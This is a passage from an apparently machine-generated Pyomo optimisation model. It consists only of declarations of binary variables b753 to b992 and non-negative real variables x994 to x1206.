m.b753 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b754 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b755 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b756 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b757 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b758 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b759 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b760 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b761 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b762 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b763 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b764 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b765 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b766 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b767 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b768 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b769 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b770 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b771 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b772 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b773 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b774 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b775 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b776 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b777 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b778 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b779 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b780 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b781 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b782 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b783 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b784 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b785 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b786 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b787 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b788 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b789 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b790 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b791 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b792 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b793 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b794 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b795 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b796 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b797 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b798 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b799 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b800 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b801 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b802 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b803 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b804 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b805 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b806 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b807 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b808 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b809 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b810 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b811 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b812 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b813 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b814 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b815 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b816 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b817 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b818 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b819 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b820 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b821 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b822 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b823 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b824 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b825 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b826 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b827 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b828 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b829 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b830 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b831 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b832 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b833 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b834 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b835 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b836 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b837 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b838 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b839 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b840 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b841 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b842 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b843 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b844 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b845 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b846 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b847 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b848 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b849 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b850 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b851 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b852 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b853 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b854 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b855 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b856 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b857 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b858 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b859 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b860 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b861 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b862 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b863 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b864 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b865 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b866 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b867 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b868 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b869 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b870 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b871 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b872 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b873 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b874 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b875 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b876 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b877 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b878 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b879 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b880 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b881 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b882 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b883 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b884 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b885 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b886 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b887 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b888 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b889 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b890 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b891 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b892 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b893 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b894 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b895 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b896 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b897 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b898 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b899 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b900 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b901 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b902 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b903 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b904 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b905 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b906 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b907 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b908 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b909 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b910 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b911 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b912 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b913 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b914 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b915 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b916 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b917 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b918 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b919 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b920 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b921 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b922 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b923 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b924 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b925 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b926 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b927 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b928 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b929 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b930 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b931 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b932 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b933 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b934 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b935 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b936 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b937 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b938 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b939 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b940 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b941 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b942 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b943 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b944 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b945 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b946 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b947 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b948 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b949 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b950 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b951 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b952 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b953 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b954 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b955 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b956 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b957 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b958 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b959 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b960 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b961 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b962 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b963 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b964 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b965 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b966 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b967 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b968 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b969 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b970 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b971 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b972 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b973 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b974 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b975 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b976 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b977 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b978 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b979 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b980 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b981 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b982 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b983 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b984 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b985 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b986 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b987 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b988 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b989 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b990 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b991 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b992 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.x994 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x995 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x996 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x997 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x998 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x999 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1000 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1001 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1002 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1003 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1004 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1005 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1006 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1007 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1008 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1009 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1010 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1011 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1012 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1013 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1014 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1015 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1016 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1017 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1018 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1019 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1020 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1021 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1022 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1023 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1024 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1025 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1026 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1027 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1028 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1029 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1030 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1031 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1032 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1033 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1034 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1035 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1036 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1037 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1038 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1039 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1040 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1041 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1042 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1043 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1044 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1045 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1046 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1047 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1048 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1049 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1050 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1051 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1052 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1053 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1054 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1055 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1056 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1057 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1058 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1059 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1060 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1061 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1062 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1063 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1064 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1065 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1066 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1067 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1068 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1069 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1070 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1071 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1072 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1073 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1074 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1075 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1076 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1077 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1078 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1079 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1080 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1081 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1082 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1083 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1084 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1085 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1086 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1087 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1088 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1089 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1090 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1091 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1092 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1093 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1094 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1095 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1096 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1097 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1098 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1099 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1100 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1101 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1102 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1103 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1104 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1105 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1106 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1107 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1108 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1109 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1110 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1111 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1112 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1113 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1114 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1115 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1116 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1117 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1118 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1119 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1120 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1121 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1122 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1123 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1124 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1125 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1126 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1127 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1128 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1129 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1130 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1131 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1132 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1133 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1134 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1135 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1136 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1137 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1138 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1139 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1140 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1141 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1142 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1143 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1144 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1145 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1146 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1147 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1148 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1149 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1150 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1151 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1152 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1153 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1154 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1155 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1156 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1157 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1158 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1159 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1160 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1161 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1162 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1163 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1164 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1165 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1166 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1167 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1168 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1169 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1170 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1171 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1172 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1173 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1174 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1175 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1176 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1177 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1178 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1179 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1180 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1181 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1182 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1183 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1184 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1185 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1186 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1187 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1188 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1189 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1190 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1191 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1192 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1193 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1194 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1195 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1196 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1197 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1198 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1199 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1200 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1201 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1202 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1203 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1204 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1205 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1206 = Var(within=Reals,bounds=(0,None),initialize=0)
